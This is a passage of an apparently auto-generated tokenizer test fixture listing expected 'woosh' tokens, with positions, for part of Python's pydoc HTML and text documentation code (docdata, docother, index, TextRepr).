woosh.Token(woosh.COMMENT, "# XXX lambda's won't usually have func_annotations['return']", 1069, 20, 1069, 80),
woosh.Token(woosh.COMMENT, "# since the syntax doesn't support but it is possible.", 1070, 20, 1070, 74),
woosh.Token(woosh.COMMENT, "# So removing parentheses isn't truly safe.", 1071, 20, 1071, 63),
woosh.Token(woosh.NAME, 'argspec', 1072, 20, 1072, 27),
woosh.Token(woosh.OP, '=', 1072, 28, 1072, 29),
woosh.Token(woosh.NAME, 'argspec', 1072, 30, 1072, 37),
woosh.Token(woosh.OP, '[', 1072, 37, 1072, 38),
woosh.Token(woosh.NUMBER, '1', 1072, 38, 1072, 39),
woosh.Token(woosh.OP, ':', 1072, 39, 1072, 40),
woosh.Token(woosh.OP, '-', 1072, 40, 1072, 41),
woosh.Token(woosh.NUMBER, '1', 1072, 41, 1072, 42),
woosh.Token(woosh.OP, ']', 1072, 42, 1072, 43),
woosh.Token(woosh.COMMENT, '# remove parentheses', 1072, 44, 1072, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1072, 64, 1073, 0),
woosh.Token(woosh.DEDENT, ' ', 1073, 0, 1073, 8),
woosh.Token(woosh.DEDENT, '', 1073, 8, 1073, 8),
woosh.Token(woosh.DEDENT, '', 1073, 8, 1073, 8),
woosh.Token(woosh.NAME, 'if', 1073, 8, 1073, 10),
woosh.Token(woosh.NAME, 'not', 1073, 11, 1073, 14),
woosh.Token(woosh.NAME, 'argspec', 1073, 15, 1073, 22),
woosh.Token(woosh.OP, ':', 1073, 22, 1073, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1073, 23, 1074, 0),
woosh.Token(woosh.INDENT, ' ', 1074, 0, 1074, 12),
woosh.Token(woosh.NAME, 'argspec', 1074, 12, 1074, 19),
woosh.Token(woosh.OP, '=', 1074, 20, 1074, 21),
woosh.Token(woosh.STRING, "'(...)'", 1074, 22, 1074, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1074, 29, 1075, 0),
woosh.Token(woosh.DEDENT, ' ', 1076, 0, 1076, 8),
woosh.Token(woosh.NAME, 'decl', 1076, 8, 1076, 12),
woosh.Token(woosh.OP, '=', 1076, 13, 1076, 14),
woosh.Token(woosh.NAME, 'asyncqualifier', 1076, 15, 1076, 29),
woosh.Token(woosh.OP, '+', 1076, 30, 1076, 31),
woosh.Token(woosh.NAME, 'title', 1076, 32, 1076, 37),
woosh.Token(woosh.OP, '+', 1076, 38, 1076, 39),
woosh.Token(woosh.NAME, 'self', 1076, 40, 1076, 44),
woosh.Token(woosh.OP, '.', 1076, 44, 1076, 45),
woosh.Token(woosh.NAME, 'escape', 1076, 45, 1076, 51),
woosh.Token(woosh.OP, '(', 1076, 51, 1076, 52),
woosh.Token(woosh.NAME, 'argspec', 1076, 52, 1076, 59),
woosh.Token(woosh.OP, ')', 1076, 59, 1076, 60),
woosh.Token(woosh.OP, '+', 1076, 61, 1076, 62),
woosh.Token(woosh.OP, '(', 1076, 63, 1076, 64),
woosh.Token(woosh.NAME, 'note', 1076, 64, 1076, 68),
woosh.Token(woosh.NAME, 'and', 1076, 69, 1076, 72),
woosh.Token(woosh.NAME, 'self', 1077, 15, 1077, 19),
woosh.Token(woosh.OP, '.', 1077, 19, 1077, 20),
woosh.Token(woosh.NAME, 'grey', 1077, 20, 1077, 24),
woosh.Token(woosh.OP, '(', 1077, 24, 1077, 25),
woosh.Token(woosh.STRING, '\'<font face="helvetica, arial">%s</font>\'', 1077, 25, 1077, 66),
woosh.Token(woosh.OP, '%', 1077, 67, 1077, 68),
woosh.Token(woosh.NAME, 'note', 1077, 69, 1077, 73),
woosh.Token(woosh.OP, ')', 1077, 73, 1077, 74),
woosh.Token(woosh.OP, ')', 1077, 74, 1077, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1077, 75, 1078, 0),
woosh.Token(woosh.NAME, 'if', 1079, 8, 1079, 10),
woosh.Token(woosh.NAME, 'skipdocs', 1079, 11, 1079, 19),
woosh.Token(woosh.OP, ':', 1079, 19, 1079, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1079, 20, 1080, 0),
woosh.Token(woosh.INDENT, ' ', 1080, 0, 1080, 12),
woosh.Token(woosh.NAME, 'return', 1080, 12, 1080, 18),
woosh.Token(woosh.STRING, "'<dl><dt>%s</dt></dl>\\n'", 1080, 19, 1080, 43),
woosh.Token(woosh.OP, '%', 1080, 44, 1080, 45),
woosh.Token(woosh.NAME, 'decl', 1080, 46, 1080, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1080, 50, 1081, 0),
woosh.Token(woosh.DEDENT, ' ', 1081, 0, 1081, 8),
woosh.Token(woosh.NAME, 'else', 1081, 8, 1081, 12),
woosh.Token(woosh.OP, ':', 1081, 12, 1081, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1081, 13, 1082, 0),
woosh.Token(woosh.INDENT, ' ', 1082, 0, 1082, 12),
woosh.Token(woosh.NAME, 'doc', 1082, 12, 1082, 15),
woosh.Token(woosh.OP, '=', 1082, 16, 1082, 17),
woosh.Token(woosh.NAME, 'self', 1082, 18, 1082, 22),
woosh.Token(woosh.OP, '.', 1082, 22, 1082, 23),
woosh.Token(woosh.NAME, 'markup', 1082, 23, 1082, 29),
woosh.Token(woosh.OP, '(', 1082, 29, 1082, 30),
woosh.Token(woosh.NAME, 'getdoc', 1083, 16, 1083, 22),
woosh.Token(woosh.OP, '(', 1083, 22, 1083, 23),
woosh.Token(woosh.NAME, 'object', 1083, 23, 1083, 29),
woosh.Token(woosh.OP, ')', 1083, 29, 1083, 30),
woosh.Token(woosh.OP, ',', 1083, 30, 1083, 31),
woosh.Token(woosh.NAME, 'self', 1083, 32, 1083, 36),
woosh.Token(woosh.OP, '.', 1083, 36, 1083, 37),
woosh.Token(woosh.NAME, 'preformat', 1083, 37, 1083, 46),
woosh.Token(woosh.OP, ',', 1083, 46, 1083, 47),
woosh.Token(woosh.NAME, 'funcs', 1083, 48, 1083, 53),
woosh.Token(woosh.OP, ',', 1083, 53, 1083, 54),
woosh.Token(woosh.NAME, 'classes', 1083, 55, 1083, 62),
woosh.Token(woosh.OP, ',', 1083, 62, 1083, 63),
woosh.Token(woosh.NAME, 'methods', 1083, 64, 1083, 71),
woosh.Token(woosh.OP, ')', 1083, 71, 1083, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1083, 72, 1084, 0),
woosh.Token(woosh.NAME, 'doc', 1084, 12, 1084, 15),
woosh.Token(woosh.OP, '=', 1084, 16, 1084, 17),
woosh.Token(woosh.NAME, 'doc', 1084, 18, 1084, 21),
woosh.Token(woosh.NAME, 'and', 1084, 22, 1084, 25),
woosh.Token(woosh.STRING, "'<dd><tt>%s</tt></dd>'", 1084, 26, 1084, 48),
woosh.Token(woosh.OP, '%', 1084, 49, 1084, 50),
woosh.Token(woosh.NAME, 'doc', 1084, 51, 1084, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1084, 54, 1085, 0),
woosh.Token(woosh.NAME, 'return', 1085, 12, 1085, 18),
woosh.Token(woosh.STRING, "'<dl><dt>%s</dt>%s</dl>\\n'", 1085, 19, 1085, 45),
woosh.Token(woosh.OP, '%', 1085, 46, 1085, 47),
woosh.Token(woosh.OP, '(', 1085, 48, 1085, 49),
woosh.Token(woosh.NAME, 'decl', 1085, 49, 1085, 53),
woosh.Token(woosh.OP, ',', 1085, 53, 1085, 54),
woosh.Token(woosh.NAME, 'doc', 1085, 55, 1085, 58),
woosh.Token(woosh.OP, ')', 1085, 58, 1085, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1085, 59, 1086, 0),
woosh.Token(woosh.DEDENT, ' ', 1087, 0, 1087, 4),
woosh.Token(woosh.DEDENT, '', 1087, 4, 1087, 4),
woosh.Token(woosh.NAME, 'def', 1087, 4, 1087, 7),
woosh.Token(woosh.NAME, 'docdata', 1087, 8, 1087, 15),
woosh.Token(woosh.OP, '(', 1087, 15, 1087, 16),
woosh.Token(woosh.NAME, 'self', 1087, 16, 1087, 20),
woosh.Token(woosh.OP, ',', 1087, 20, 1087, 21),
woosh.Token(woosh.NAME, 'object', 1087, 22, 1087, 28),
woosh.Token(woosh.OP, ',', 1087, 28, 1087, 29),
woosh.Token(woosh.NAME, 'name', 1087, 30, 1087, 34),
woosh.Token(woosh.OP, '=', 1087, 34, 1087, 35),
woosh.Token(woosh.NAME, 'None', 1087, 35, 1087, 39),
woosh.Token(woosh.OP, ',', 1087, 39, 1087, 40),
woosh.Token(woosh.NAME, 'mod', 1087, 41, 1087, 44),
woosh.Token(woosh.OP, '=', 1087, 44, 1087, 45),
woosh.Token(woosh.NAME, 'None', 1087, 45, 1087, 49),
woosh.Token(woosh.OP, ',', 1087, 49, 1087, 50),
woosh.Token(woosh.NAME, 'cl', 1087, 51, 1087, 53),
woosh.Token(woosh.OP, '=', 1087, 53, 1087, 54),
woosh.Token(woosh.NAME, 'None', 1087, 54, 1087, 58),
woosh.Token(woosh.OP, ')', 1087, 58, 1087, 59),
woosh.Token(woosh.OP, ':', 1087, 59, 1087, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1087, 60, 1088, 0),
woosh.Token(woosh.INDENT, ' ', 1088, 0, 1088, 8),
woosh.Token(woosh.STRING, '"""Produce html documentation for a data descriptor."""', 1088, 8, 1088, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1088, 63, 1089, 0),
woosh.Token(woosh.NAME, 'results', 1089, 8, 1089, 15),
woosh.Token(woosh.OP, '=', 1089, 16, 1089, 17),
woosh.Token(woosh.OP, '[', 1089, 18, 1089, 19),
woosh.Token(woosh.OP, ']', 1089, 19, 1089, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1089, 20, 1090, 0),
woosh.Token(woosh.NAME, 'push', 1090, 8, 1090, 12),
woosh.Token(woosh.OP, '=', 1090, 13, 1090, 14),
woosh.Token(woosh.NAME, 'results', 1090, 15, 1090, 22),
woosh.Token(woosh.OP, '.', 1090, 22, 1090, 23),
woosh.Token(woosh.NAME, 'append', 1090, 23, 1090, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1090, 29, 1091, 0),
woosh.Token(woosh.NAME, 'if', 1092, 8, 1092, 10),
woosh.Token(woosh.NAME, 'name', 1092, 11, 1092, 15),
woosh.Token(woosh.OP, ':', 1092, 15, 1092, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1092, 16, 1093, 0),
woosh.Token(woosh.INDENT, ' ', 1093, 0, 1093, 12),
woosh.Token(woosh.NAME, 'push', 1093, 12, 1093, 16),
woosh.Token(woosh.OP, '(', 1093, 16, 1093, 17),
woosh.Token(woosh.STRING, "'<dl><dt><strong>%s</strong></dt>\\n'", 1093, 17, 1093, 53),
woosh.Token(woosh.OP, '%', 1093, 54, 1093, 55),
woosh.Token(woosh.NAME, 'name', 1093, 56, 1093, 60),
woosh.Token(woosh.OP, ')', 1093, 60, 1093, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1093, 61, 1094, 0),
woosh.Token(woosh.DEDENT, ' ', 1094, 0, 1094, 8),
woosh.Token(woosh.NAME, 'doc', 1094, 8, 1094, 11),
woosh.Token(woosh.OP, '=', 1094, 12, 1094, 13),
woosh.Token(woosh.NAME, 'self', 1094, 14, 1094, 18),
woosh.Token(woosh.OP, '.', 1094, 18, 1094, 19),
woosh.Token(woosh.NAME, 'markup', 1094, 19, 1094, 25),
woosh.Token(woosh.OP, '(', 1094, 25, 1094, 26),
woosh.Token(woosh.NAME, 'getdoc', 1094, 26, 1094, 32),
woosh.Token(woosh.OP, '(', 1094, 32, 1094, 33),
woosh.Token(woosh.NAME, 'object', 1094, 33, 1094, 39),
woosh.Token(woosh.OP, ')', 1094, 39, 1094, 40),
woosh.Token(woosh.OP, ',', 1094, 40, 1094, 41),
woosh.Token(woosh.NAME, 'self', 1094, 42, 1094, 46),
woosh.Token(woosh.OP, '.', 1094, 46, 1094, 47),
woosh.Token(woosh.NAME, 'preformat', 1094, 47, 1094, 56),
woosh.Token(woosh.OP, ')', 1094, 56, 1094, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 1094, 57, 1095, 0),
woosh.Token(woosh.NAME, 'if', 1095, 8, 1095, 10),
woosh.Token(woosh.NAME, 'doc', 1095, 11, 1095, 14),
woosh.Token(woosh.OP, ':', 1095, 14, 1095, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1095, 15, 1096, 0),
woosh.Token(woosh.INDENT, ' ', 1096, 0, 1096, 12),
woosh.Token(woosh.NAME, 'push', 1096, 12, 1096, 16),
woosh.Token(woosh.OP, '(', 1096, 16, 1096, 17),
woosh.Token(woosh.STRING, "'<dd><tt>%s</tt></dd>\\n'", 1096, 17, 1096, 41),
woosh.Token(woosh.OP, '%', 1096, 42, 1096, 43),
woosh.Token(woosh.NAME, 'doc', 1096, 44, 1096, 47),
woosh.Token(woosh.OP, ')', 1096, 47, 1096, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1096, 48, 1097, 0),
woosh.Token(woosh.DEDENT, ' ', 1097, 0, 1097, 8),
woosh.Token(woosh.NAME, 'push', 1097, 8, 1097, 12),
woosh.Token(woosh.OP, '(', 1097, 12, 1097, 13),
woosh.Token(woosh.STRING, "'</dl>\\n'", 1097, 13, 1097, 22),
woosh.Token(woosh.OP, ')', 1097, 22, 1097, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1097, 23, 1098, 0),
woosh.Token(woosh.NAME, 'return', 1099, 8, 1099, 14),
woosh.Token(woosh.STRING, "''", 1099, 15, 1099, 17),
woosh.Token(woosh.OP, '.', 1099, 17, 1099, 18),
woosh.Token(woosh.NAME, 'join', 1099, 18, 1099, 22),
woosh.Token(woosh.OP, '(', 1099, 22, 1099, 23),
woosh.Token(woosh.NAME, 'results', 1099, 23, 1099, 30),
woosh.Token(woosh.OP, ')', 1099, 30, 1099, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1099, 31, 1100, 0),
woosh.Token(woosh.DEDENT, ' ', 1101, 0, 1101, 4),
woosh.Token(woosh.NAME, 'docproperty', 1101, 4, 1101, 15),
woosh.Token(woosh.OP, '=', 1101, 16, 1101, 17),
woosh.Token(woosh.NAME, 'docdata', 1101, 18, 1101, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1101, 25, 1102, 0),
woosh.Token(woosh.NAME, 'def', 1103, 4, 1103, 7),
woosh.Token(woosh.NAME, 'docother', 1103, 8, 1103, 16),
woosh.Token(woosh.OP, '(', 1103, 16, 1103, 17),
woosh.Token(woosh.NAME, 'self', 1103, 17, 1103, 21),
woosh.Token(woosh.OP, ',', 1103, 21, 1103, 22),
woosh.Token(woosh.NAME, 'object', 1103, 23, 1103, 29),
woosh.Token(woosh.OP, ',', 1103, 29, 1103, 30),
woosh.Token(woosh.NAME, 'name', 1103, 31, 1103, 35),
woosh.Token(woosh.OP, '=', 1103, 35, 1103, 36),
woosh.Token(woosh.NAME, 'None', 1103, 36, 1103, 40),
woosh.Token(woosh.OP, ',', 1103, 40, 1103, 41),
woosh.Token(woosh.NAME, 'mod', 1103, 42, 1103, 45),
woosh.Token(woosh.OP, '=', 1103, 45, 1103, 46),
woosh.Token(woosh.NAME, 'None', 1103, 46, 1103, 50),
woosh.Token(woosh.OP, ',', 1103, 50, 1103, 51),
woosh.Token(woosh.OP, '*', 1103, 52, 1103, 53),
woosh.Token(woosh.NAME, 'ignored', 1103, 53, 1103, 60),
woosh.Token(woosh.OP, ')', 1103, 60, 1103, 61),
woosh.Token(woosh.OP, ':', 1103, 61, 1103, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1103, 62, 1104, 0),
woosh.Token(woosh.INDENT, ' ', 1104, 0, 1104, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a data object."""', 1104, 8, 1104, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1104, 59, 1105, 0),
woosh.Token(woosh.NAME, 'lhs', 1105, 8, 1105, 11),
woosh.Token(woosh.OP, '=', 1105, 12, 1105, 13),
woosh.Token(woosh.NAME, 'name', 1105, 14, 1105, 18),
woosh.Token(woosh.NAME, 'and', 1105, 19, 1105, 22),
woosh.Token(woosh.STRING, "'<strong>%s</strong> = '", 1105, 23, 1105, 47),
woosh.Token(woosh.OP, '%', 1105, 48, 1105, 49),
woosh.Token(woosh.NAME, 'name', 1105, 50, 1105, 54),
woosh.Token(woosh.NAME, 'or', 1105, 55, 1105, 57),
woosh.Token(woosh.STRING, "''", 1105, 58, 1105, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1105, 60, 1106, 0),
woosh.Token(woosh.NAME, 'return', 1106, 8, 1106, 14),
woosh.Token(woosh.NAME, 'lhs', 1106, 15, 1106, 18),
woosh.Token(woosh.OP, '+', 1106, 19, 1106, 20),
woosh.Token(woosh.NAME, 'self', 1106, 21, 1106, 25),
woosh.Token(woosh.OP, '.', 1106, 25, 1106, 26),
woosh.Token(woosh.NAME, 'repr', 1106, 26, 1106, 30),
woosh.Token(woosh.OP, '(', 1106, 30, 1106, 31),
woosh.Token(woosh.NAME, 'object', 1106, 31, 1106, 37),
woosh.Token(woosh.OP, ')', 1106, 37, 1106, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1106, 38, 1107, 0),
woosh.Token(woosh.DEDENT, ' ', 1108, 0, 1108, 4),
woosh.Token(woosh.NAME, 'def', 1108, 4, 1108, 7),
woosh.Token(woosh.NAME, 'index', 1108, 8, 1108, 13),
woosh.Token(woosh.OP, '(', 1108, 13, 1108, 14),
woosh.Token(woosh.NAME, 'self', 1108, 14, 1108, 18),
woosh.Token(woosh.OP, ',', 1108, 18, 1108, 19),
woosh.Token(woosh.NAME, 'dir', 1108, 20, 1108, 23),
woosh.Token(woosh.OP, ',', 1108, 23, 1108, 24),
woosh.Token(woosh.NAME, 'shadowed', 1108, 25, 1108, 33),
woosh.Token(woosh.OP, '=', 1108, 33, 1108, 34),
woosh.Token(woosh.NAME, 'None', 1108, 34, 1108, 38),
woosh.Token(woosh.OP, ')', 1108, 38, 1108, 39),
woosh.Token(woosh.OP, ':', 1108, 39, 1108, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1108, 40, 1109, 0),
woosh.Token(woosh.INDENT, ' ', 1109, 0, 1109, 8),
woosh.Token(woosh.STRING, '"""Generate an HTML index for a directory of modules."""', 1109, 8, 1109, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 1109, 64, 1110, 0),
woosh.Token(woosh.NAME, 'modpkgs', 1110, 8, 1110, 15),
woosh.Token(woosh.OP, '=', 1110, 16, 1110, 17),
woosh.Token(woosh.OP, '[', 1110, 18, 1110, 19),
woosh.Token(woosh.OP, ']', 1110, 19, 1110, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1110, 20, 1111, 0),
woosh.Token(woosh.NAME, 'if', 1111, 8, 1111, 10),
woosh.Token(woosh.NAME, 'shadowed', 1111, 11, 1111, 19),
woosh.Token(woosh.NAME, 'is', 1111, 20, 1111, 22),
woosh.Token(woosh.NAME, 'None', 1111, 23, 1111, 27),
woosh.Token(woosh.OP, ':', 1111, 27, 1111, 28),
woosh.Token(woosh.NAME, 'shadowed', 1111, 29, 1111, 37),
woosh.Token(woosh.OP, '=', 1111, 38, 1111, 39),
woosh.Token(woosh.OP, '{', 1111, 40, 1111, 41),
woosh.Token(woosh.OP, '}', 1111, 41, 1111, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1111, 42, 1112, 0),
woosh.Token(woosh.NAME, 'for', 1112, 8, 1112, 11),
woosh.Token(woosh.NAME, 'importer', 1112, 12, 1112, 20),
woosh.Token(woosh.OP, ',', 1112, 20, 1112, 21),
woosh.Token(woosh.NAME, 'name', 1112, 22, 1112, 26),
woosh.Token(woosh.OP, ',', 1112, 26, 1112, 27),
woosh.Token(woosh.NAME, 'ispkg', 1112, 28, 1112, 33),
woosh.Token(woosh.NAME, 'in', 1112, 34, 1112, 36),
woosh.Token(woosh.NAME, 'pkgutil', 1112, 37, 1112, 44),
woosh.Token(woosh.OP, '.', 1112, 44, 1112, 45),
woosh.Token(woosh.NAME, 'iter_modules', 1112, 45, 1112, 57),
woosh.Token(woosh.OP, '(', 1112, 57, 1112, 58),
woosh.Token(woosh.OP, '[', 1112, 58, 1112, 59),
woosh.Token(woosh.NAME, 'dir', 1112, 59, 1112, 62),
woosh.Token(woosh.OP, ']', 1112, 62, 1112, 63),
woosh.Token(woosh.OP, ')', 1112, 63, 1112, 64),
woosh.Token(woosh.OP, ':', 1112, 64, 1112, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1112, 65, 1113, 0),
woosh.Token(woosh.INDENT, ' ', 1113, 0, 1113, 12),
woosh.Token(woosh.NAME, 'if', 1113, 12, 1113, 14),
woosh.Token(woosh.NAME, 'any', 1113, 15, 1113, 18),
woosh.Token(woosh.OP, '(', 1113, 18, 1113, 19),
woosh.Token(woosh.OP, '(', 1113, 19, 1113, 20),
woosh.Token(woosh.NUMBER, '0xD800', 1113, 20, 1113, 26),
woosh.Token(woosh.OP, '<=', 1113, 27, 1113, 29),
woosh.Token(woosh.NAME, 'ord', 1113, 30, 1113, 33),
woosh.Token(woosh.OP, '(', 1113, 33, 1113, 34),
woosh.Token(woosh.NAME, 'ch', 1113, 34, 1113, 36),
woosh.Token(woosh.OP, ')', 1113, 36, 1113, 37),
woosh.Token(woosh.OP, '<=', 1113, 38, 1113, 40),
woosh.Token(woosh.NUMBER, '0xDFFF', 1113, 41, 1113, 47),
woosh.Token(woosh.OP, ')', 1113, 47, 1113, 48),
woosh.Token(woosh.NAME, 'for', 1113, 49, 1113, 52),
woosh.Token(woosh.NAME, 'ch', 1113, 53, 1113, 55),
woosh.Token(woosh.NAME, 'in', 1113, 56, 1113, 58),
woosh.Token(woosh.NAME, 'name', 1113, 59, 1113, 63),
woosh.Token(woosh.OP, ')', 1113, 63, 1113, 64),
woosh.Token(woosh.OP, ':', 1113, 64, 1113, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1113, 65, 1114, 0),
woosh.Token(woosh.COMMENT, '# ignore a module if its name contains a surrogate character', 1114, 16, 1114, 76),
woosh.Token(woosh.INDENT, ' ', 1115, 0, 1115, 16),
woosh.Token(woosh.NAME, 'continue', 1115, 16, 1115, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1115, 24, 1116, 0),
woosh.Token(woosh.DEDENT, ' ', 1116, 0, 1116, 12),
woosh.Token(woosh.NAME, 'modpkgs', 1116, 12, 1116, 19),
woosh.Token(woosh.OP, '.', 1116, 19, 1116, 20),
woosh.Token(woosh.NAME, 'append', 1116, 20, 1116, 26),
woosh.Token(woosh.OP, '(', 1116, 26, 1116, 27),
woosh.Token(woosh.OP, '(', 1116, 27, 1116, 28),
woosh.Token(woosh.NAME, 'name', 1116, 28, 1116, 32),
woosh.Token(woosh.OP, ',', 1116, 32, 1116, 33),
woosh.Token(woosh.STRING, "''", 1116, 34, 1116, 36),
woosh.Token(woosh.OP, ',', 1116, 36, 1116, 37),
woosh.Token(woosh.NAME, 'ispkg', 1116, 38, 1116, 43),
woosh.Token(woosh.OP, ',', 1116, 43, 1116, 44),
woosh.Token(woosh.NAME, 'name', 1116, 45, 1116, 49),
woosh.Token(woosh.NAME, 'in', 1116, 50, 1116, 52),
woosh.Token(woosh.NAME, 'shadowed', 1116, 53, 1116, 61),
woosh.Token(woosh.OP, ')', 1116, 61, 1116, 62),
woosh.Token(woosh.OP, ')', 1116, 62, 1116, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 1116, 63, 1117, 0),
woosh.Token(woosh.NAME, 'shadowed', 1117, 12, 1117, 20),
woosh.Token(woosh.OP, '[', 1117, 20, 1117, 21),
woosh.Token(woosh.NAME, 'name', 1117, 21, 1117, 25),
woosh.Token(woosh.OP, ']', 1117, 25, 1117, 26),
woosh.Token(woosh.OP, '=', 1117, 27, 1117, 28),
woosh.Token(woosh.NUMBER, '1', 1117, 29, 1117, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1117, 30, 1118, 0),
woosh.Token(woosh.DEDENT, ' ', 1119, 0, 1119, 8),
woosh.Token(woosh.NAME, 'modpkgs', 1119, 8, 1119, 15),
woosh.Token(woosh.OP, '.', 1119, 15, 1119, 16),
woosh.Token(woosh.NAME, 'sort', 1119, 16, 1119, 20),
woosh.Token(woosh.OP, '(', 1119, 20, 1119, 21),
woosh.Token(woosh.OP, ')', 1119, 21, 1119, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 1119, 22, 1120, 0),
woosh.Token(woosh.NAME, 'contents', 1120, 8, 1120, 16),
woosh.Token(woosh.OP, '=', 1120, 17, 1120, 18),
woosh.Token(woosh.NAME, 'self', 1120, 19, 1120, 23),
woosh.Token(woosh.OP, '.', 1120, 23, 1120, 24),
woosh.Token(woosh.NAME, 'multicolumn', 1120, 24, 1120, 35),
woosh.Token(woosh.OP, '(', 1120, 35, 1120, 36),
woosh.Token(woosh.NAME, 'modpkgs', 1120, 36, 1120, 43),
woosh.Token(woosh.OP, ',', 1120, 43, 1120, 44),
woosh.Token(woosh.NAME, 'self', 1120, 45, 1120, 49),
woosh.Token(woosh.OP, '.', 1120, 49, 1120, 50),
woosh.Token(woosh.NAME, 'modpkglink', 1120, 50, 1120, 60),
woosh.Token(woosh.OP, ')', 1120, 60, 1120, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1120, 61, 1121, 0),
woosh.Token(woosh.NAME, 'return', 1121, 8, 1121, 14),
woosh.Token(woosh.NAME, 'self', 1121, 15, 1121, 19),
woosh.Token(woosh.OP, '.', 1121, 19, 1121, 20),
woosh.Token(woosh.NAME, 'bigsection', 1121, 20, 1121, 30),
woosh.Token(woosh.OP, '(', 1121, 30, 1121, 31),
woosh.Token(woosh.NAME, 'dir', 1121, 31, 1121, 34),
woosh.Token(woosh.OP, ',', 1121, 34, 1121, 35),
woosh.Token(woosh.STRING, "'#ffffff'", 1121, 36, 1121, 45),
woosh.Token(woosh.OP, ',', 1121, 45, 1121, 46),
woosh.Token(woosh.STRING, "'#ee77aa'", 1121, 47, 1121, 56),
woosh.Token(woosh.OP, ',', 1121, 56, 1121, 57),
woosh.Token(woosh.NAME, 'contents', 1121, 58, 1121, 66),
woosh.Token(woosh.OP, ')', 1121, 66, 1121, 67),
woosh.Token(woosh.NEWLINE, '\r\n', 1121, 67, 1122, 0),
woosh.Token(woosh.COMMENT, '# -------------------------------------------- text documentation generator', 1123, 0, 1123, 75),
woosh.Token(woosh.DEDENT, '', 1125, 0, 1125, 0),
woosh.Token(woosh.DEDENT, '', 1125, 0, 1125, 0),
woosh.Token(woosh.NAME, 'class', 1125, 0, 1125, 5),
woosh.Token(woosh.NAME, 'TextRepr', 1125, 6, 1125, 14),
woosh.Token(woosh.OP, '(', 1125, 14, 1125, 15),
woosh.Token(woosh.NAME, 'Repr', 1125, 15, 1125, 19),
woosh.Token(woosh.OP, ')', 1125, 19, 1125, 20),
woosh.Token(woosh.OP, ':', 1125, 20, 1125, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1125, 21, 1126, 0),
woosh.Token(woosh.INDENT, ' ', 1126, 0, 1126, 4),
woosh.Token(woosh.STRING, '"""Class for safely making a text representation of a Python object."""', 1126, 4, 1126, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 1126, 75, 1127, 0),
woosh.Token(woosh.NAME, 'def', 1127, 4, 1127, 7),
woosh.Token(woosh.NAME, '__init__', 1127, 8, 1127, 16),
woosh.Token(woosh.OP, '(', 1127, 16, 1127, 17),
woosh.Token(woosh.NAME, 'self', 1127, 17, 1127, 21),
woosh.Token(woosh.OP, ')', 1127, 21, 1127, 22),
woosh.Token(woosh.OP, ':', 1127, 22, 1127, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1127, 23, 1128, 0),
woosh.Token(woosh.INDENT, ' ', 1128, 0, 1128, 8),
woosh.Token(woosh.NAME, 'Repr', 1128, 8, 1128, 12),
woosh.Token(woosh.OP, '.', 1128, 12, 1128, 13),
woosh.Token(woosh.NAME, '__init__', 1128, 13, 1128, 21),
woosh.Token(woosh.OP, '(', 1128, 21, 1128, 22),
woosh.Token(woosh.NAME, 'self', 1128, 22, 1128, 26),
woosh.Token(woosh.OP, ')', 1128, 26, 1128, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1128, 27, 1129, 0),
woosh.Token(woosh.NAME, 'self', 1129, 8, 1129, 12),
woosh.Token(woosh.OP, '.', 1129, 12, 1129, 13),
woosh.Token(woosh.NAME, 'maxlist', 1129, 13, 1129, 20),
woosh.Token(woosh.OP, '=', 1129, 21, 1129, 22),
woosh.Token(woosh.NAME, 'self', 1129, 23, 1129, 27),
woosh.Token(woosh.OP, '.', 1129, 27, 1129, 28),
woosh.Token(woosh.NAME, 'maxtuple', 1129, 28, 1129, 36),
woosh.Token(woosh.OP, '=', 1129, 37, 1129, 38),
woosh.Token(woosh.NUMBER, '20', 1129, 39, 1129, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1129, 41, 1130, 0),
woosh.Token(woosh.NAME, 'self', 1130, 8, 1130, 12),
woosh.Token(woosh.OP, '.', 1130, 12, 1130, 13),
woosh.Token(woosh.NAME, 'maxdict', 1130, 13, 1130, 20),
woosh.Token(woosh.OP, '=', 1130, 21, 1130, 22),
woosh.Token(woosh.NUMBER, '10', 1130, 23, 1130, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1130, 25, 1131, 0),
woosh.Token(woosh.NAME, 'self', 1131, 8, 1131, 12),
woosh.Token(woosh.OP, '.', 1131, 12, 1131, 13),
woosh.Token(woosh.NAME, 'maxstring', 1131, 13, 1131, 22),
woosh.Token(woosh.OP, '=', 1131, 23, 1131, 24),
